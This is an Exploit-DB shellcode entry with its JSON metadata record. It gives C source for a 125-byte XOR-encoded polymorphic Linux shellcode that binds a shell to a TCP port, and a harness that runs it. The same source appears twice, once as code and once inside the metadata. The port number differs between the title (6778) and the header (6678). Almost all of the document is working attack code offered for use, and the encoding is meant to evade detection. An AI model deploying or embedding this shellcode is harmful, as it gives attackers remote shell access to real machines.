125 bind port to 6778 XOR encoded polymorphic linux shellcode
2010-07-05T00:00:00
ID EDB-ID:14234 Type exploitdb Reporter gunslinger_ Modified 2010-07-05T00:00:00
Description
125 bind port to 6778 XOR encoded polymorphic linux shellcode .. Shellcode exploit for linux platform
/*
Title : bind port to 6678 XOR encoded polymorphic linux shellcode .
Name : 125 bind port to 6678 XOR encoded polymorphic linux shellcode .
Date : Tue Jul 6 01:52:33 WIT 2010
Author : gunslinger_ <yudha.gunslinger[at]gmail.com>
Web : http://devilzc0de.org
blog : http://gunslingerc0de.wordpress.com
tested on : linux debian
special thanks to : r0073r (inj3ct0r.com), d3hydr8 (darkc0de.com), ty miller (projectshellcode.com), jonathan salwan(shell-storm.org), mywisdom (devilzc0de.org), loneferret (offensive-security.com)
greetzz to all devilzc0de, jasakom, yogyacarderlink, serverisdown, indonesianhacker and all my friend !!
*/
#include <stdio.h>
char shellcode[] = "\xeb\x11\x5e\x31\xc9\xb1\x65\x80\x74\x0e\xff"
"\x0a\x80\xe9\x01\x75\xf6\xeb\x05\xe8\xea\xff"
"\xff\xff\x3b\xca\x3b\xd1\x3b\xd8\x5a\x60\x0b"
"\x60\x08\x83\xeb\xf4\xc9\xba\x6c\xc7\x8a\x83"
"\xcc\x58\x62\xb1\x08\x10\x70\x83\xeb\x60\x1a"
"\x5b\x5c\x83\xeb\xf4\xc9\xba\x6c\xc7\x8a\x58"
"\x5c\x83\xeb\xb9\x0e\xba\x6c\xc7\x8a\x58\x58"
"\x5c\x83\xeb\xf4\xc9\xba\x6c\xc7\x8a\x83\xc9"
"\x3b\xc3\xba\x35\xc7\x8a\x4b\xba\x35\xc7\x8a"
"\x4b\xba\x35\xc7\x8a\x58\x62\x25\x25\x79\x62"
"\x62\x25\x68\x63\x64\x83\xe9\x58\x59\x83\xeb"
"\xba\x01\xc7\x8a";
int main(void)
{
fprintf(stdout,"Length: %d\n",strlen(shellcode));
(*(void(*)()) shellcode)();
}
{"id": "EDB-ID:14234", "hash": "e680f92357fce6936008e9a0cc8dd243", "type": "exploitdb", "bulletinFamily": "exploit", "title": "125 bind port to 6778 XOR encoded polymorphic linux shellcode", "description": "125 bind port to 6778 XOR encoded polymorphic linux shellcode .. Shellcode exploit for linux platform", "published": "2010-07-05T00:00:00", "modified": "2010-07-05T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://www.exploit-db.com/exploits/14234/", "reporter": "gunslinger_", "references": [], "cvelist": [], "lastseen": "2016-02-01T19:25:49", "history": [], "viewCount": 2, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}, "vulnersScore": 7.5}, "objectVersion": "1.4", "sourceHref": "https://www.exploit-db.com/download/14234/", "sourceData": "/*\r\nTitle : bind port to 6678 XOR encoded polymorphic linux shellcode .\r\nName : 125 bind port to 6678 XOR encoded polymorphic linux shellcode .\r\nDate : Tue Jul 6 01:52:33 WIT 2010\r\nAuthor : gunslinger_ <yudha.gunslinger[at]gmail.com>\r\nWeb : http://devilzc0de.org\r\nblog : http://gunslingerc0de.wordpress.com\r\ntested on : linux debian\r\nspecial thanks to : r0073r (inj3ct0r.com), d3hydr8 (darkc0de.com), ty miller (projectshellcode.com), jonathan salwan(shell-storm.org), mywisdom (devilzc0de.org), loneferret (offensive-security.com)\r\ngreetzz to all devilzc0de, jasakom, yogyacarderlink, serverisdown, indonesianhacker and all my friend !!\r\n*/\r\n\r\n#include <stdio.h>\r\n\r\nchar shellcode[] = \"\\xeb\\x11\\x5e\\x31\\xc9\\xb1\\x65\\x80\\x74\\x0e\\xff\"\r\n\t\t \"\\x0a\\x80\\xe9\\x01\\x75\\xf6\\xeb\\x05\\xe8\\xea\\xff\"\r\n\t\t \"\\xff\\xff\\x3b\\xca\\x3b\\xd1\\x3b\\xd8\\x5a\\x60\\x0b\"\r\n\t\t \"\\x60\\x08\\x83\\xeb\\xf4\\xc9\\xba\\x6c\\xc7\\x8a\\x83\"\r\n\t\t \"\\xcc\\x58\\x62\\xb1\\x08\\x10\\x70\\x83\\xeb\\x60\\x1a\"\r\n\t\t \"\\x5b\\x5c\\x83\\xeb\\xf4\\xc9\\xba\\x6c\\xc7\\x8a\\x58\"\r\n\t\t \"\\x5c\\x83\\xeb\\xb9\\x0e\\xba\\x6c\\xc7\\x8a\\x58\\x58\"\r\n\t\t \"\\x5c\\x83\\xeb\\xf4\\xc9\\xba\\x6c\\xc7\\x8a\\x83\\xc9\"\r\n\t\t \"\\x3b\\xc3\\xba\\x35\\xc7\\x8a\\x4b\\xba\\x35\\xc7\\x8a\"\r\n\t\t \"\\x4b\\xba\\x35\\xc7\\x8a\\x58\\x62\\x25\\x25\\x79\\x62\"\r\n\t\t \"\\x62\\x25\\x68\\x63\\x64\\x83\\xe9\\x58\\x59\\x83\\xeb\"\r\n\t\t \"\\xba\\x01\\xc7\\x8a\";\r\n\r\n\t\t\r\nint main(void)\r\n{\r\n\tfprintf(stdout,\"Length: %d\\n\",strlen(shellcode));\r\n\t(*(void(*)()) shellcode)();\r\n}\r\n", "osvdbidlist": [], "_object_type": "robots.models.exploitdb.ExploitDbBulletin", "_object_types": ["robots.models.exploitdb.ExploitDbBulletin", "robots.models.base.Bulletin"]}
